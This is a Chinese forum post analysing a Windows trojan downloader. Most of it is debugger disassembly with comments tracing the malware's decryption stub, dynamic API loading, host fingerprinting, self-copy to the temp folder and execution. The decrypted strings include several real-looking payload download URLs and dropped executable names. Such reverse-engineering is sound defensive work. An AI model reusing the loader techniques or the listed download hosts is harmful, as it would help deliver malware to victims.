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[PC样本分析] 病毒分析之下载者(一)

我是用户 发表于 2014-8-25 17:40


[Asm] 纯文本查看 复制代码
004011A2  |.  8D45 D0       lea     eax, [local.12]        eax=0x00401760
004011A5  |.  50            push    eax                              ; /pWndClassEx
004011A6  |.  FF15 54304000 call    dword ptr [<&USER32.RegisterClas>; \RegisterClassExA

[Asm] 纯文本查看 复制代码
004012AC  |.  6A 00         push    0x0                              ; /lParam = NULL
004012AE  |.  8B4D 08       mov     ecx, [arg.1]                     ; |
004012B1  |.  51            push    ecx                              ; |hInst
004012B2  |.  6A 00         push    0x0                              ; |hMenu = NULL
004012B4  |.  6A 00         push    0x0                              ; |hParent = NULL
004012B6  |.  6A 00         push    0x0                              ; |Height = 0x0
004012B8  |.  68 00000080   push    0x80000000                       ; |Width = 80000000 (-2147483648.)
004012BD  |.  6A 00         push    0x0                              ; |Y = 0x0
004012BF  |.  68 00000080   push    0x80000000                       ; |X = 80000000 (-2147483648.)
004012C4  |.  68 0000CF00   push    0xCF0000                         ; |Style = WS_OVERLAPPED|WS_MINIMIZEBOX|WS_MAXIMIZEBOX|WS_SYSMENU|WS_THICKFRAME|WS_CAPTION
004012C9  |.  68 10404000   push    00404010                         ; |WindowName = "trast"
004012CE  |.  68 18404000   push    00404018                         ; |Class = "bask"
004012D3  |.  6A 00         push    0x0                              ; |ExtStyle = 0
004012D5  |.  FF15 34304000 call    dword ptr [<&USER32.CreateWindow>; \CreateWindowExA

[Asm] 纯文本查看 复制代码
004017CA   > \8B4D 08       mov     ecx, dword ptr [ebp+0x8]
004017CD   .  890D E0434000 mov     dword ptr [0x4043E0], ecx
004017D3   .  6A 00         push    0x0                              ; /lParam = NULL
004017D5   .  8B15 80424000 mov     edx, dword ptr [0x404280]        ; |23.00400000
004017DB   .  52            push    edx                              ; |hInst => 00400000
004017DC   .  6A 00         push    0x0                              ; |hMenu = NULL
004017DE   .  8B45 08       mov     eax, dword ptr [ebp+0x8]         ; |
004017E1   .  50            push    eax                              ; |hParent
004017E2   .  6A 1C         push    0x1C                             ; |Height = 1C (28.)
004017E4   .  68 A0000000   push    0xA0                             ; |Width = A0 (160.)
004017E9   .  6A 28         push    0x28                             ; |Y = 28 (40.)
004017EB   .  6A 28         push    0x28                             ; |X = 28 (40.)
004017ED   .  68 04000040   push    0x40000004                       ; |Style = WS_CHILD|4
004017F2   .  8D4D 8C       lea     ecx, dword ptr [ebp-0x74]        ; |
004017F5   .  51            push    ecx                              ; |WindowName
004017F6   .  68 B4304000   push    004030B4                         ; |Class = "EDIT"
004017FB   .  6A 00         push    0x0                              ; |ExtStyle = 0
004017FD   .  FF15 34304000 call    dword ptr [<&USER32.CreateWindow>; \CreateWindowExA
00401803   .  A3 E4434000   mov     dword ptr [0x4043E4], eax
00401808   .  6A 00         push    0x0                              ; /hTemplateFile = NULL
0040180A   .  6A 00         push    0x0                              ; |Attributes = 0
0040180C   .  6A 03         push    0x3                              ; |Mode = OPEN_EXISTING
0040180E   .  6A 00         push    0x0                              ; |pSecurity = NULL
00401810   .  6A 00         push    0x0                              ; |ShareMode = 0
00401812   .  68 00000080   push    0x80000000                       ; |Access = GENERIC_READ
00401817   .  68 BC304000   push    004030BC                         ; |FileName = "settings.ini"
0040181C   .  FF15 20304000 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA

[Asm] 纯文本查看 复制代码
00401822   .  8945 84       mov     dword ptr [ebp-0x7C], eax
00401825   .  837D 84 FF    cmp     dword ptr [ebp-0x7C], -0x1
00401829   .  75 13         jnz     short 0040183E
0040182B   .  6A 67         push    0x67                             ; /lParam = 0x67
0040182D   .  6A 68         push    0x68                             ; |wParam = 0x68
0040182F   .  68 11010000   push    0x111                            ; |Message = WM_COMMAND
00401834   .  8B55 08       mov     edx, dword ptr [ebp+0x8]         ; |
00401837   .  52            push    edx                              ; |hWnd
00401838   .  FF15 38304000 call    dword ptr [<&USER32.PostMessageA>; \PostMessageA
0040183E   >  B8 01000000   mov     eax, 0x1

[Asm] 纯文本查看 复制代码
0040184D   > \8B45 10       mov     eax, dword ptr [ebp+0x10]
00401850   .  25 FFFF0000   and     eax, 0xFFFF
00401855   .  0FB7C8        movzx   ecx, ax
00401858   .  894D 88       mov     dword ptr [ebp-0x78], ecx
0040185B   .  8B55 10       mov     edx, dword ptr [ebp+0x10]
0040185E   .  C1EA 10       shr     edx, 0x10
00401861   .  81E2 FFFF0000 and     edx, 0xFFFF
00401867   .  0FB7C2        movzx   eax, dx
0040186A   .  8945 80       mov     dword ptr [ebp-0x80], eax
0040186D   .  8B4D 88       mov     ecx, dword ptr [ebp-0x78]
00401870   .  898D 74FFFFFF mov     dword ptr [ebp-0x8C], ecx
00401876   .  83BD 74FFFFFF>cmp     dword ptr [ebp-0x8C], 0x68
0040187D   .  74 0B         je      short 0040188A
0040187F   .  83BD 74FFFFFF>cmp     dword ptr [ebp-0x8C], 0x69
00401886   .  74 20         je      short 004018A8
00401888   .  EB 2A         jmp     short 004018B4
0040188A   >  6A 00         push    0x0                              ; /lParam = NULL
0040188C   .  68 601B4000   push    00401B60                         ; |DlgProc = 23.00401B60
00401891   .  8B55 08       mov     edx, dword ptr [ebp+0x8]         ; |
00401894   .  52            push    edx                              ; |hOwner
00401895   .  8B45 14       mov     eax, dword ptr [ebp+0x14]        ; |
00401898   .  50            push    eax                              ; |pTemplate
00401899   .  8B0D 80424000 mov     ecx, dword ptr [0x404280]        ; |23.00400000
0040189F   .  51            push    ecx                              ; |hInst => 00400000
004018A0   .  FF15 68304000 call    dword ptr [<&USER32.DialogBoxPar>; \DialogBoxParamA
004018A6   .  EB 24         jmp     short 004018CC
004018A8   >  8B55 08       mov     edx, dword ptr [ebp+0x8]
004018AB   .  52            push    edx                              ; /hWnd
004018AC   .  FF15 30304000 call    dword ptr [<&USER32.DestroyWindo>; \DestroyWindow

缓冲区里的字符串为:Hello disop top..pussy woosy hi..little doka cry。
最后传入local.1,调用call 00401cB0开始病毒的解密。
[Asm] 纯文本查看 复制代码
00401B83  |> \6A 00         push    0x0                              ; /lParam = 0x0
00401B85  |.  6A 00         push    0x0                              ; |wParam = 0x0
00401B87  |.  68 BD000000   push    0xBD                             ; |Message = EM_GETHANDLE
00401B8C  |.  8B0D E4434000 mov     ecx, dword ptr [0x4043E4]        ; |
00401B92  |.  51            push    ecx                              ; |hWnd => 0x2006B0
00401B93  |.  FF15 40304000 call    dword ptr [<&USER32.SendMessageA>; \SendMessageA
00401B99  |.  8945 F8       mov     [local.2], eax
00401B9C  |.  8B55 F8       mov     edx, [local.2]
00401B9F  |.  8B02          mov     eax, dword ptr [edx]
00401BA1  |.  8945 F4       mov     [local.3], eax
00401BA4  |.  C745 FC 00000>mov     [local.1], 0x0
00401BAB  |>  8B4D F4       /mov     ecx, [local.3]
00401BAE  |.  0FBE11        |movsx   edx, byte ptr [ecx]
00401BB1  |.  83FA 73       |cmp     edx, 0x73
00401BB4  |.  74 14         |je      short 00401BCA
00401BB6  |.  8B45 FC       |mov     eax, [local.1]
00401BB9  |.  83C0 01       |add     eax, 0x1
00401BBC  |.  8945 FC       |mov     [local.1], eax
00401BBF  |.  8B4D F4       |mov     ecx, [local.3]
00401BC2  |.  83C1 01       |add     ecx, 0x1
00401BC5  |.  894D F4       |mov     [local.3], ecx
00401BC8  |.^ EB E1         \jmp     short 00401BAB
00401BCA  |>  8B15 E0434000 mov     edx, dword ptr [0x4043E0]
00401BD0  |.  52            push    edx                              ; /hWnd => 002706B4 ('trast',class='bask')
00401BD1  |.  FF15 30304000 call    dword ptr [<&USER32.DestroyWindo>; \DestroyWindow
00401BD7  |.  8B4D FC       mov     ecx, [local.1]
00401BDA  |.  E8 D1000000   call    00401CB0
00401BDF  |.  33C0          xor     eax, eax


[Asm] 纯文本查看 复制代码
00401CB0   $  55            push    ebp
00401CB1   .  BA 601A4000   mov     edx, 00401A60
00401CB6   .  8F05 84424000 pop     dword ptr [0x404284]
00401CBC   >  42            inc     edx
00401CBD   .^ E2 FD         loopd   short 00401CBC
00401CBF   .  52            push    edx
00401CC0   .  8D35 F0434000 lea     esi, dword ptr [0x4043F0]
00401CC6   .  8BFE          mov     edi, esi
00401CC8   .  68 401D4000   push    00401D40                         ;  入口地址
00401CCD   .  C3            retn                                     ;  RET 用作跳转到 00401D40

[Asm] 纯文本查看 复制代码
00401A68  |.  6A 11         push    0x11
00401A6A  |.  6A 0B         push    0xB
00401A6C  |.  E8 5F040000   call    00401ED0
00401A71  |.  5E            pop     esi
00401A72  |.  5F            pop     edi
00401A73  |.  8BE5          mov     esp, ebp
00401A75  |.  5D            pop     ebp
00401A76  \.  C3            retn

[Asm] 纯文本查看 复制代码
00401900 >/$  56            push    esi                              ;  esi=key
00401901  |.  57            push    edi                              ;  edi=要解密的地址
00401902  |.  53            push    ebx                              ;  ebx=Key大小
00401903  |.  50            push    eax                              ;  eax为当前key指针
00401904  |.  5B            pop     ebx                              ;  ebx=eax
00401905  |.  8BD3          mov     edx, ebx                         ;  edx=eax
00401907  |>  51            /push    ecx                             ;  ecx=Size
00401908  |.  E8 63000000   |call    00401970                        ;  解密算法
0040190D  |.  59            |pop     ecx
0040190E  |.^ E2 F7         \loopd   short 00401907
00401910  |.  5B            pop     ebx
00401911  |.  5F            pop     edi
00401912  |.  5E            pop     esi
00401913  |.  33C0          xor     eax, eax
00401915  \.  C3            retn

004043CC  89 2E CF 45 B9 AB D0 F5 CE F8 3D BA 24 C9 31 00  ?螮公絮硒=??.
004043CC  56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00     VirtualProtect.

[Asm] 纯文本查看 复制代码
00401380   > /57            push    edi
00401381   . |8B0D 14304000 mov     ecx, dword ptr [<&KERNEL32.GetMo>;  kernel32.GetModuleHandleA
00401387   . |890D 8C424000 mov     dword ptr [40428C], ecx
0040138D   . |51            push    ecx
0040138E   . |33C0          xor     eax, eax
00401390   . |E8 DB000000   call    <GetApiAddress>                  ;  得到VirtualProtect地址
00401395   . |68 B0114000   push    004011B0
0040139A   . |C3            retn                                     ;  RET 用作跳转到 004011B0

[Asm] 纯文本查看 复制代码
0040121F   > \BA 50204000   mov     edx, 00402050                    ;  解密这块数据
00401224   .  68 A00F0000   push    0FA0
00401229   .  52            push    edx
0040122A   .  8D35 10164000 lea     esi, dword ptr [401610]
00401230   .  FFD7          call    edi                              ;  给402050添加写权限
00401232   .  B9 FA090000   mov     ecx, 9FA                         ;  ecx=9FA
00401237   .  8D3D 50204000 lea     edi, dword ptr [402050]          ;  edi=402050
0040123D   .  48            dec     eax
0040123E   .  85C0          test    eax, eax
00401240   .  0F84 FA030000 je      00401640

[Asm] 纯文本查看 复制代码
0040205E   .  4C 6F 61 64 4>ascii   "LoadLibraryA",0
0040206B   .  47 65 74 50 7>ascii   "GetProcAddress",0
0040207A      01            db      01
0040207B   .  6E 74 64 6C 6>ascii   "ntdll.dll",0
00402085   .  73 77 70 72 6>ascii   "swprintf",0
0040208E   .  52 74 6C 44 6>ascii   "RtlDecompressBuf"
0040209E   .  66 65 72 00   ascii   "fer",0
004020A2      01            db      01
004020A3   .  6B 65 72 6E 6>ascii   "kernel32.dll",0
004020B0   .  6C 73 74 72 6>ascii   "lstrcmpW",0
004020B9   .  47 65 74 43 6>ascii   "GetComputerNameW"
004020C9   .  00            ascii   0
004020CA   .  47 65 74 56 6>ascii   "GetVersionExW",0
004020D8   .  47 65 74 4D 6>ascii   "GetModuleFileNam"
004020E8   .  65 57 00      ascii   "eW",0
004020EB   .  47 65 74 54 6>ascii   "GetTempPathW",0
004020F8   .  43 72 65 61 7>ascii   "CreateFileW",0
00402104   .  52 65 61 64 4>ascii   "ReadFile",0
0040210D   .  57 72 69 74 6>ascii   "WriteFile",0
00402117   .  44 65 6C 65 7>ascii   "DeleteFileW",0
00402123   .  47 65 74 43 7>ascii   "GetCurrentDirect"
00402133   .  6F 72 79 57 0>ascii   "oryW",0
00402138   .  6C 73 74 72 6>ascii   "lstrlenW",0
00402141   .  43 6C 6F 73 6>ascii   "CloseHandle",0
0040214D   .  47 65 74 46 6>ascii   "GetFileSize",0
00402159   .  56 69 72 74 7>ascii   "VirtualAlloc",0
00402166   .  53 6C 65 65 7>ascii   "SleepEx",0
0040216E   .  45 78 69 74 5>ascii   "ExitProcess",0
0040217A      01            db      01
0040217B   .  77 69 6E 69 6>ascii   "wininet.dll",0
00402187   .  49 6E 74 65 7>ascii   "InternetOpenW",0
00402195   .  49 6E 74 65 7>ascii   "InternetConnectW"
004021A5   .  00            ascii   0
004021A6   .  48 74 74 70 4>ascii   "HttpOpenRequestW"
004021B6   .  00            ascii   0
004021B7   .  48 74 74 70 5>ascii   "HttpSendRequestW"
004021C7   .  00            ascii   0
004021C8   .  49 6E 74 65 7>ascii   "InternetCloseHan"
004021D8   .  64 6C 65 00   ascii   "dle",0
004021DC   .  49 6E 74 65 7>ascii   "InternetReadFile"
004021EC   .  00            ascii   0
004021ED      01            db      01
004021EE   .  73 68 65 6C 6>ascii   "shell32.dll",0
004021FA   .  53 68 65 6C 6>ascii   "ShellExecuteW",0
00402208      02            db      02
00402209      50            db      50                               ;  CHAR 'P'
0040220A      00            db      00
0040220B   .  25 73 25 73 0>ascii   "%s%s",0
00402210   .  25 73 5C 25 7>ascii   "%s\%s",0
00402216   .  6F 70 65 6E 0>ascii   "open",0
0040221B   .  74 65 78 74 2>ascii   "text/*",0
00402222   .  61 70 70 6C 6>ascii   "application/*",0
00402230   .  47 45 54 00   ascii   "GET",0
00402234   .  4F 70 65 72 6>ascii   "Opera",0
0040223A   .  74 7A 71 75 7>ascii   "tzquw.exe",0
00402244   .  39 34 2E 32 3>ascii   "",0
00402252   .  73 6C 70 78 6>ascii   "slpxl.exe",0
0040225C   .  70 6F 72 66 6>ascii   "porfintengoweb.c"
0040226C   .  6F 6D 00      ascii   "om",0
0040226F   .  2F 63 73 73 2>ascii   "/css/11s1.zip",0
0040227D   .  6A 63 2D 63 6>ascii   "jc-charge-it.nl",0
0040228D   .  2F 70 61 67 6>ascii   "/pages/11s1.zip",0
0040229D   .  69 79 62 6B 6>ascii   "iybkc.exe",0
004022A7   .  66 6C 69 67 6>ascii   "flightss.d-webs."
004022B7   .  63 6F 6D 00   ascii   "com",0
004022BB   .  2F 69 6D 61 6>ascii   "/images/airlines"
004022CB   .  2D 6C 6F 67 6>ascii   "-logo/h76id30.zi"
004022DB   .  70 00         ascii   "p",0
004022DD   .  65 74 61 78 6>ascii   "etaxiuae.com",0
004022EA   .  2F 75 70 6C 6>ascii   "/uploads/h76id30"
004022FA   .  2E 7A 69 70 0>ascii   ".zip",0
004022FF   .  31 31 30 38 7>ascii   "1108us1",0
00402307   .  31 31 30 38 6>ascii   "1108h",0

[Asm] 纯文本查看 复制代码
00401640   > \A1 8C424000   mov     eax, dword ptr [40428C]
00401645   .  50            push    eax
00401646   .  8D15 70144000 lea     edx, dword ptr [<GetApiAddress>]
0040164C   .  52            push    edx
0040164D   .  B8 28000000   mov     eax, 28
00401652   .  E8 A9020000   call    <解密CALL>
00401657   .  85C0          test    eax, eax
00401659   .  0F84 F1090000 je      00402050

[Asm] 纯文本查看 复制代码
00402050   > \E8 00000000   call    00402055
00402055   $  5B            pop     ebx
00402056   .  83C3 09       add     ebx, 9                           ;  定位解密后的数据
00402059   .  E9 CE020000   jmp     0040232C

[Asm] 纯文本查看 复制代码
00402331   .  895D F4       mov     dword ptr [ebp-C], ebx
00402334   .  53            push    ebx
00402335   .  FF75 04       push    dword ptr [ebp+4]
00402338   .  FF55 00       call    dword ptr [ebp]                  ;  得到LoadLibraryA地址
0040233B   .  8945 FC       mov     dword ptr [ebp-4], eax
0040233E   .  50            push    eax
0040233F   .  33C0          xor     eax, eax
00402341   >  8A03          mov     al, byte ptr [ebx]
00402343   .  43            inc     ebx
00402344   .  85C0          test    eax, eax
00402346   .^ 75 F9         jnz     short 00402341                   ;  定位下一个函数字符串
00402348   .  53            push    ebx
00402349   .  FF75 04       push    dword ptr [ebp+4]
0040234C   .  FF55 00       call    dword ptr [ebp]                  ;  得到GetProcAddress地址
0040234F   .  8945 F8       mov     dword ptr [ebp-8], eax
00402352   .  50            push    eax
00402353   .  8BF3          mov     esi, ebx
00402355   >  AC            lods    byte ptr [esi]
00402356   .  84C0          test    al, al
00402358   .^ 75 FB         jnz     short 00402355
0040235A   .  AC            lods    byte ptr [esi]
0040235B   .  FEC8          dec     al                               ;  Switch (cases 1..2)
0040235D   .  74 0F         je      short 0040236E                   ;  载入dll
0040235F   .  FEC8          dec     al
00402361   .  74 14         je      short 00402377
00402363   .  4E            dec     esi                              ;  Default case of switch 0040235B
00402364   .  56            push    esi
00402365   .  FF75 F0       push    dword ptr [ebp-10]
00402368   .  FF55 F8       call    dword ptr [ebp-8]                ;  GetProcAddress
0040236B   .  50            push    eax
0040236C   .^ EB E7         jmp     short 00402355
0040236E   >  56            push    esi                              ;  Case 1 of switch 0040235B
0040236F   .  FF55 FC       call    dword ptr [ebp-4]                ;  LadLibrary
00402372   .  8945 F0       mov     dword ptr [ebp-10], eax
00402375   .^ EB DE         jmp     short 00402355

[Asm] 纯文本查看 复制代码
0012F9E0   7D685FDD  shell32.ShellExecuteW
0012F9E4   7669826F  wininet.InternetReadFile
0012F9E8   76694DD4  wininet.InternetCloseHandle
0012F9EC   766E36AC  wininet.HttpSendRequestW
0012F9F0   7669F507  wininet.HttpOpenRequestW
0012F9F4   7669EE30  wininet.InternetConnectW
0012F9F8   7668AF85  wininet.InternetOpenW
0012F9FC   7C81CB12  kernel32.ExitProcess
0012FA00   7C8023A0  kernel32.SleepEx
0012FA04   7C809AF1  kernel32.VirtualAlloc
0012FA08   7C810B17  kernel32.GetFileSize
0012FA0C   7C809BE7  kernel32.CloseHandle
0012FA10   7C809AA9  kernel32.lstrlenW
0012FA14   7C80B917  kernel32.GetCurrentDirectoryW
0012FA18   7C831F63  RETURN to kernel32.DeleteFileW
0012FA1C   7C810E27  kernel32.WriteFile
0012FA20   7C801812  kernel32.ReadFile
0012FA24   7C810800  kernel32.CreateFileW
0012FA28   7C830791  RETURN to kernel32.GetTempPathW
0012FA2C   7C80B475  kernel32.GetModuleFileNameW
0012FA30   7C80AF05  kernel32.GetVersionExW
0012FA34   7C8316CF  kernel32.GetComputerNameW
0012FA38   7C80AA6C  kernel32.lstrcmpW
0012FA3C   7C980BE1  ntdll.RtlDecompressBuffer
0012FA40   7C9384BB  RETURN to ntdll.swprintf
0012FA44   7C80AE40  kernel32.GetProcAddress
0012FA48   7C801D7B  kernel32.LoadLibraryA
0012FA4C   7D590000  offset shell32.#599
0012FA50   0040205E  ASCII "LoadLibraryA"
0012FA54   7C80AE40  kernel32.GetProcAddress
0012FA58   7C801D7B  kernel32.LoadLibraryA

[Asm] 纯文本查看 复制代码
00402377   > \8B45 F4            mov     eax, dword ptr [ebp-C]           ;  Case 2 of switch 0040235B
0040237A   .  8BC8               mov     ecx, eax
0040237C   .  05 42060000        add     eax, 642                         ;  定位Unknow_1
00402381   .  50                 push    eax
00402382   .  8BC1               mov     eax, ecx
00402384   .  05 4D060000        add     eax, 64D                         ;  定位Unknow_2
00402389   .  50                 push    eax
0040238A   .  8BC1               mov     eax, ecx
0040238C   .  05 5A050000        add     eax, 55A                         ;  定位Unknow_3
00402391   .  50                 push    eax
00402392   .  8BEC               mov     ebp, esp
00402394   .  81C4 8CFDFFFF      add     esp, -274
0040239A   >  6A 04              push    4
0040239C   .  68 00100000        push    1000
004023A1   .  68 C0D8A700        push    0A7D8C0
004023A6   .  6A 00              push    0
004023A8   .  FF55 30            call    dword ptr [ebp+30]               ;  VirtualAlloc
004023AB   .  85C0               test    eax, eax                         ;  eax=0x00A70000
004023AD   .^ 74 EB              je      short 0040239A
004023AF   .  8945 BC            mov     dword ptr [ebp-44], eax
004023B2   .  05 80841E00        add     eax, 1E8480
004023B7   .  8945 B8            mov     dword ptr [ebp-48], eax
004023BA   .  05 00127A00        add     eax, 7A1200
004023BF   .  8945 F4            mov     dword ptr [ebp-C], eax
004023C2   .  B9 00100000        mov     ecx, 1000
004023C7   .  03C1               add     eax, ecx
004023C9   .  8945 F0            mov     dword ptr [ebp-10], eax
004023CC   .  03C1               add     eax, ecx
004023CE   .  03C1               add     eax, ecx
004023D0   .  8945 D0            mov     dword ptr [ebp-30], eax
004023D3   .  03C1               add     eax, ecx
004023D5   .  8945 FC            mov     dword ptr [ebp-4], eax
004023D8   .  8BD8               mov     ebx, eax
004023DA   .  03C1               add     eax, ecx
004023DC   .  8BF8               mov     edi, eax
004023DE   .  33C0               xor     eax, eax
004023E0   .  66:AD              lods    word ptr [esi]
004023E2   .  8945 AC            mov     dword ptr [ebp-54], eax          ;  var_54=0x50
004023E5   .  33C0               xor     eax, eax
004023E7   .  8BC8               mov     ecx, eax
004023E9   .  8BD0               mov     edx, eax
004023EB   >  893B               mov     dword ptr [ebx], edi
004023ED   .  83C3 04            add     ebx, 4
004023F0   >  AC                 lods    byte ptr [esi]                   ;  esi=0x0040220B
004023F1   .  3C 01              cmp     al, 1
004023F3   .  74 09              je      short 004023FE
004023F5   .  66:AB              stos    word ptr es:[edi]                ;  0x13FE680
004023F7   .  41                 inc     ecx
004023F8   .  84C0               test    al, al
004023FA   .^ 75 F4              jnz     short 004023F0
004023FC   .^ EB ED              jmp     short 004023EB
004023FE   >  33C0               xor     eax, eax
00402400   .  AC                 lods    byte ptr [esi]
00402401   .  8975 F8            mov     dword ptr [ebp-8], esi
00402404   .  C1E0 02            shl     eax, 2
00402407   .  03F0               add     esi, eax
00402409   .  33C0               xor     eax, eax
0040240B   .  AC                 lods    byte ptr [esi]
0040240C   .  8945 A4            mov     dword ptr [ebp-5C], eax
0040240F   .  897D A0            mov     dword ptr [ebp-60], edi
00402412   .  8BC8               mov     ecx, eax
00402414   .  FC                 cld
00402415   >  AD                 lods    dword ptr [esi]
00402416   .  AB                 stos    dword ptr es:[edi]
00402417   .  33C0               xor     eax, eax
00402419   .  66:AD              lods    word ptr [esi]
0040241B   .  AB                 stos    dword ptr es:[edi]
0040241C   .^ E2 F7              loopd   short 00402415
0040241E   .  B8 00040000        mov     eax, 400                         ;  将ASCIIl转成UNICODE
00402423   .  897D B0            mov     dword ptr [ebp-50], edi
00402426   .  03F8               add     edi, eax
00402428   .  897D 94            mov     dword ptr [ebp-6C], edi
0040242B   .  8BDF               mov     ebx, edi
0040242D   .  03D8               add     ebx, eax
0040242F   .  B0 2F              mov     al, 2F
00402431   .  AA                 stos    byte ptr es:[edi]
00402432   .  33C0               xor     eax, eax
00402434   .  AA                 stos    byte ptr es:[edi]
00402435   .  B8 C8000000        mov     eax, 0C8

[Asm] 纯文本查看 复制代码
0040243A   .  8D75 98            lea     esi, dword ptr [ebp-68]
0040243D   .  8906               mov     dword ptr [esi], eax
0040243F   .  56                 push    esi
00402440   .  57                 push    edi
00402441   .  FF55 60            call    dword ptr [ebp+60]               ;  GetComputerNameW
00402444   .  AD                 lods    dword ptr [esi]
00402445   .  D1E0               shl     eax, 1
00402447   .  03F8               add     edi, eax
00402449   .  B0 2F              mov     al, 2F
0040244B   .  AA                 stos    byte ptr es:[edi]
0040244C   .  33C0               xor     eax, eax
0040244E   .  AA                 stos    byte ptr es:[edi]
0040244F   .  B4 04              mov     ah, 4
00402451   .  895D 98            mov     dword ptr [ebp-68], ebx
00402454   .  8BFB               mov     edi, ebx
00402456   .  03D8               add     ebx, eax
00402458   .  B9 1C010000        mov     ecx, 11C
0040245D   .  8BF3               mov     esi, ebx
0040245F   .  890E               mov     dword ptr [esi], ecx
00402461   .  56                 push    esi
00402462   .  FF55 5C            call    dword ptr [ebp+5C]               ;  GetVersionExW
00402465   .  33C0               xor     eax, eax
00402467   .  B0 2F              mov     al, 2F
00402469   .  66:AB              stos    word ptr es:[edi]
0040246B   .  AD                 lods    dword ptr [esi]
0040246C   .  AD                 lods    dword ptr [esi]
0040246D   .  04 30              add     al, 30
0040246F   .  66:AB              stos    word ptr es:[edi]
00402471   .  AD                 lods    dword ptr [esi]
00402472   .  04 30              add     al, 30
00402474   .  66:AB              stos    word ptr es:[edi]
00402476   .  81C6 0E010000      add     esi, 10E
0040247C   .  AC                 lods    byte ptr [esi]
0040247D   .  3C 01              cmp     al, 1
0040247F   .  74 0C              je      short 0040248D
00402481   .  B0 53              mov     al, 53
00402483   .  66:AB              stos    word ptr es:[edi]
00402485   .  B0 45              mov     al, 45
00402487   .  66:AB              stos    word ptr es:[edi]
00402489   .  B0 52              mov     al, 52
0040248B   .  66:AB              stos    word ptr es:[edi]
0040248D   >  83EE 07            sub     esi, 7
00402490   .  66:AD              lods    word ptr [esi]
00402492   .  66:85C0            test    ax, ax
00402495   .  74 12              je      short 004024A9
00402497   .  50                 push    eax
00402498   .  B0 2D              mov     al, 2D
0040249A   .  66:AB              stos    word ptr es:[edi]
0040249C   .  B0 53              mov     al, 53
0040249E   .  66:AB              stos    word ptr es:[edi]
004024A0   .  B0 50              mov     al, 50
004024A2   .  66:AB              stos    word ptr es:[edi]
004024A4   .  58                 pop     eax
004024A5   .  04 30              add     al, 30
004024A7   .  66:AB              stos    word ptr es:[edi]
004024A9   >  33C0               xor     eax, eax
004024AB   .  B0 2F              mov     al, 2F
004024AD   .  66:AB              stos    word ptr es:[edi]
004024AF   .  33C0               xor     eax, eax
004024B1   .  66:AB              stos    word ptr es:[edi]
004024B3   .  BB FF0F0000        mov     ebx, 0FFF
004024B8   .  8B7D F4            mov     edi, dword ptr [ebp-C]
004024BB   .  53                 push    ebx
004024BC   .  57                 push    edi
004024BD   .  33C0               xor     eax, eax
004024BF   .  50                 push    eax
004024C0   .  FF55 58            call    dword ptr [ebp+58]               ;  GetModuleFileNameW
004024C3   .  8B75 F0            mov     esi, dword ptr [ebp-10]
004024C6   .  56                 push    esi
004024C7   .  53                 push    ebx
004024C8   .  FF55 54            call    dword ptr [ebp+54]               ;  GetTempPathW
004024CB   .  B9 07000000        mov     ecx, 7
004024D0   .  FF55 08            call    dword ptr [ebp+8]                ;  获得tzquw.exe字符串
004024D3   .  50                 push    eax
004024D4   .  56                 push    esi
004024D5   .  B9 00000000        mov     ecx, 0
004024DA   .  FF55 08            call    dword ptr [ebp+8]
004024DD   .  50                 push    eax
004024DE   .  56                 push    esi
004024DF   .  FF55 6C            call    dword ptr [ebp+6C]               ;  swprintf
004024E2   .  83C4 18            add     esp, 18
004024E5   >  33C0               xor     eax, eax
004024E7   .  50                 push    eax
004024E8   .  68 80000000        push    80
004024ED   .  6A 03              push    3
004024EF   .  50                 push    eax
004024F0   .  6A 01              push    1
004024F2   .  68 00000080        push    80000000
004024F7   .  57                 push    edi
004024F8   .  FF55 50            call    dword ptr [ebp+50]               ;  CreateFileW
004024FB   .  83F8 FF            cmp     eax, -1
004024FE   .^ 74 E5              je      short 004024E5                   ;  直到成功创建为止
00402500   .  8945 EC            mov     dword ptr [ebp-14], eax
00402503   .  6A 00              push    0
00402505   .  50                 push    eax
00402506   .  FF55 34            call    dword ptr [ebp+34]
00402509   .  8945 E8            mov     dword ptr [ebp-18], eax
0040250C   .  50                 push    eax
0040250D   .  57                 push    edi
0040250E   .  FF55 3C            call    dword ptr [ebp+3C]
00402511   .  40                 inc     eax
00402512   .  D1E0               shl     eax, 1
00402514   .  8945 D4            mov     dword ptr [ebp-2C], eax
00402517   .  59                 pop     ecx
00402518   .  03C8               add     ecx, eax
0040251A   .  8BF1               mov     esi, ecx
0040251C   .  8B45 BC            mov     eax, dword ptr [ebp-44]
0040251F   .  8945 E4            mov     dword ptr [ebp-1C], eax
00402522   .  6A 00              push    0
00402524   .  8D4D E0            lea     ecx, dword ptr [ebp-20]
00402527   .  51                 push    ecx
00402528   .  FF75 E8            push    dword ptr [ebp-18]
0040252B   .  50                 push    eax
0040252C   .  FF75 EC            push    dword ptr [ebp-14]
0040252F   .  FF55 4C            call    dword ptr [ebp+4C]               ;  ReadFileA(读入VirtualAlloc申请的基址中)
00402532   .  FF75 F0            push    dword ptr [ebp-10]
00402535   .  FF75 F4            push    dword ptr [ebp-C]
00402538   .  FF55 64            call    dword ptr [ebp+64]               ;  lstrcmpW
0040253B   .  85C0               test    eax, eax
0040253D   .  0F84 7C010000      je      004026BF                         ;  判断是否是在temp路径下执行

[Asm] 纯文本查看 复制代码
0040257B   .  57                 push    edi
0040257C   .  8D4D E0            lea     ecx, dword ptr [ebp-20]
0040257F   .  51                 push    ecx
00402580   .  56                 push    esi
00402581   .  FF75 E4            push    dword ptr [ebp-1C]
00402584   .  50                 push    eax
00402585   .  FF55 48            call    dword ptr [ebp+48]               ;  WriteFile
00402588   .  FF75 EC            push    dword ptr [ebp-14]
0040258B   .  FF55 38            call    dword ptr [ebp+38]
0040258E   .  FF75 DC            push    dword ptr [ebp-24]
00402591   .  FF55 38            call    dword ptr [ebp+38]
00402594   .  FF75 F4            push    dword ptr [ebp-C]
00402597   .  68 00080000        push    800
0040259C   .  FF55 54            call    dword ptr [ebp+54]
0040259F   .  57                 push    edi
004025A0   .  FF75 F4            push    dword ptr [ebp-C]
004025A3   .  57                 push    edi
004025A4   .  FF75 F0            push    dword ptr [ebp-10]
004025A7   .  B9 02000000        mov     ecx, 2
004025AC   .  FF55 08            call    dword ptr [ebp+8]
004025AF   .  50                 push    eax
004025B0   .  57                 push    edi
004025B1   .  FF55 0C            call    dword ptr [ebp+C]                ;  ShellExecuteW tzquw.exe
004025B4   .  57                 push    edi
004025B5   .  FF55 28            call    dword ptr [ebp+28]               ;  ExitProcess

[Asm] 纯文本查看 复制代码
004026BF   > \8B55 E4            mov     edx, dword ptr [ebp-1C]          ;  edx=BaseAddr
004026C2   .  0FB742 3C          movzx   eax, word ptr [edx+3C]           ;  定位PE头偏移
